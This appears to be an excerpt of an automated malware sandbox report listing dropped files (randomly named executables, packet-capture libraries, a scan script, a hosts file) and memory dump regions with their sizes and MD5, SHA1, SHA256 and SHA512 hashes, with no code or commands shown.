SHA512
f9812466f56ffedced26454bce5d1b81d109a2e2b0748a3886715b9a8400ea9707d742d340d71328c340474e2ffd78ae58107699381f5fa4d90bfb775a3a7cda

Download Submit
C:\Windows\TEMP\ppgkyibiq\4268.dmp

Filesize
1.2MB

MD5
650c7b3d5169507636450b1e2bb2132b

SHA1
b1014239205c9283cf0f80ef162332ba0be313b9

SHA256
753e2baa06dc9a79ca17ba3e8a2bdb9114f5c2d9b4245fd9364993efdd3dd185

SHA512
3da2495d21ec7669741d548d28a0cb4fd5968f91d646d45db82485545ce521a394d6f69830a8910a803d9de483f422b0ba47c03823f594279fbd403836d7c32f

Download Submit
C:\Windows\TEMP\ppgkyibiq\772.dmp

Filesize
1011KB

MD5
3b479a931e2702d587b813751df8241c

SHA1
7a82e45719be98517da04ea1dc93d7009fb3aa19

SHA256
094d6832cad8d2eb18f1493cfb265c40f052602bf803115ca0c62dc89d031838

SHA512
5e144ea51932566f199b0ea031f5eba90fa7e44e70d9d6a59d55cfa2c7f6de77933d427d3324fae0e08224b4e32f5576aba68af0550cd1cc56c0ca675e55c42e

Download Submit
C:\Windows\TEMP\ppgkyibiq\988.dmp

Filesize
7.7MB

MD5
aeade3a22830790b57c0eeab854b6c3d

SHA1
673d2e603677a8b2e1529eec16053c9b5d11674f

SHA256
0cf3f14efb4172d561341a9e199b6fdc1555334093bc9a4e113ac1fe952ffec1

SHA512
e194892a8f951039b422f4461cd42d51462b422ad47f2605e151f96e55bd698e5f5f443dbf2f2b419c7e3fb662278245f92724e618c85000fbf2a493c538e0f4

Download Submit
C:\Windows\Temp\lntjubmbe\ttlnnh.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\ppgkyibiq\btjlhtrlh.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\ppgkyibiq\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
882B

MD5
8e5ae29f2d4f54c57681b465fa6bc6d8

SHA1
07d458eb7082db9db17727c9c66ca5ec9afdcf77

SHA256
338ab3fca8477479986ef11dbb13111d36afb83f56fe50731065ba78bde29054

SHA512
c5c49f8008d19896083a53a0460d0aee019770a3101f9a91c3ae0199d3729b988a74c73760251ef4493df6df8a83c5f31b8a581764b2c5ceb78fe280677d5bc9

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
954B

MD5
1040402e2f465b3ad57ccb9dc6d5138e

SHA1
8c4f786b58091a02cfa19d2a4bd476f76b669894

SHA256
49317b076e11beedce8b71dbf86ca33825bdf13ec6b1b0f2293d65a2a7c60900

SHA512
70178c748e2d74c083434aa79d4f0cdbda71fc2a4d8b9c0f87b93f8a0fea1cacbbb933801a039e6b1b93ba2439ae9b1593a5db96b68dc7efa045c30bd427ce53

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
1KB

MD5
d0b98f7c3ed378a217565d2df4769efc

SHA1
330218616144aa258fe07970d1cc8830c83dfabd

SHA256
04faedda3d9ecc8746cd501f2d702a082197ddde3e8326b35e36d00d556314d8

SHA512
55f202589babc9fa4bc509cbe043da013527dcae869b76eda66fb313d758d21f4400b1f25fd1717b75fff65663a9091568f3425190d7bfbcba3a9493227d54b7

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
2KB

MD5
607faa287e8a09144f72504d6e429ee5

SHA1
ef580bac998d1c6a68a6d64647c7477bf6ff794b

SHA256
0d2d9d47fc4c804eedb8e41c3b439f33cc4d0c1303e9f02039ffab7277b2b52f

SHA512
09d93782481bdf2c5edf7c2b18a0d13a9315f871a53413f04bb8203fab7ce7a5772c85f958e248ac0242cefbd1e015886497e66146200eefaad42661f30cdd20

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\ip.txt

Filesize
166B

MD5
f8d2157d141213a4dafe1e1a5af59fd1

SHA1
b03c0c0da06d71295d9e94cb48da4bb0694bf016

SHA256
f781eda10eb32db5822124a2093f7911baefa2b5b4786d4860b19501151f7961

SHA512
0e54350350158b5a8e5ce1b18e90fb953cc8b76a0a422ac43158d2804230556c914e553a3224fe0ebb0d00c4423416f52c4b4e9a1ca335c073d52688cb121145

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\scan.bat

Filesize
160B

MD5
8be066ac6bb5b5bfd1b86d5580235f5b

SHA1
c192b76aae7489c61635d5dbe795fd7e31d40f46

SHA256
35752b9005a368504d5c206084eb6608bd6026fd08900dc208f2fa923d5444a5

SHA512
0e0c42224f591c85c261333c44a2867f8737d3995176260f54b518ff0928dcd0714315d3a039e1f047caa0d5420ead21fec7f0c7e50cd151f553e8b88ec6b7dc

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\vmlbqggye.exe

Filesize
63KB

MD5
821ea58e3e9b6539ff0affd40e59f962

SHA1
635a301d847f3a2e85f21f7ee12add7692873569

SHA256
a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb

SHA512
0d08235781b81ff9e0a75f0e220a8d368d95ee75bf482670e83696e59d991aad68310ae7fa677ac96ffad1f97b3ec7d7208dc26d2edb111c39213b32502b82f6

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
C:\Windows\tllefmnq\yittybr.exe

Filesize
9.9MB

MD5
b42208015da414cf32c32b332398f853

SHA1
a86126537b0a3e6d85ce2360aac2ef816632d27b

SHA256
85107f72cc5a0b89ecc80221b9de836ffb3164d17fee8a28d32f215a48f37c4d

SHA512
240e3f3082417099e50c6985bff37ed5afb6d5ebddc06b4facaa923231b1dbe37823b8d7107a46a6fc8ea3b0a7b4c49d46618da34dcb2a1b69cb67b679de68b9

Download Submit
memory/996-28-0x0000000001240000-0x000000000128C000-memory.dmp

Filesize
304KB

Download
memory/1448-164-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp

Filesize
1.1MB

Download
memory/1448-229-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp

Filesize
1.1MB

Download
memory/1448-341-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp

Filesize
1.1MB

Download
memory/1448-153-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp

Filesize
1.1MB

Download
memory/1448-339-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp

Filesize
1.1MB

Download
memory/1448-338-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp

Filesize
1.1MB

Download
memory/1448-188-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp

Filesize
1.1MB

Download
memory/1448-117-0x0000013A9C540000-0x0000013A9C550000-memory.dmp

Filesize
64KB

Download
memory/1448-114-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp

Filesize
1.1MB

Download
memory/1448-132-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp

Filesize
1.1MB

Download
memory/1448-220-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp

Filesize
1.1MB

Download
memory/1448-212-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp

Filesize
1.1MB

Download
memory/1448-136-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp

Filesize
1.1MB

Download
memory/1448-171-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp

Filesize
1.1MB

Download
memory/1528-111-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1528-99-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/1808-182-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/1964-86-0x00007FF7DCC70000-0x00007FF7DCD5E000-memory.dmp

Filesize
952KB

Download
memory/1964-88-0x00007FF7DCC70000-0x00007FF7DCD5E000-memory.dmp

Filesize
952KB

Download
memory/2260-165-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/2288-143-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/2424-178-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/2500-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/2512-169-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/2520-102-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/2520-92-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/2756-151-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/3420-191-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/3464-195-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/3640-139-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/3780-147-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/3896-174-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/4156-160-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/4260-209-0x0000000000C50000-0x0000000000C62000-memory.dmp

Filesize
72KB

Download
memory/4276-156-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/4432-121-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/4476-134-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/4540-186-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download
memory/4608-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/4608-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/4752-129-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp

Filesize
364KB

Download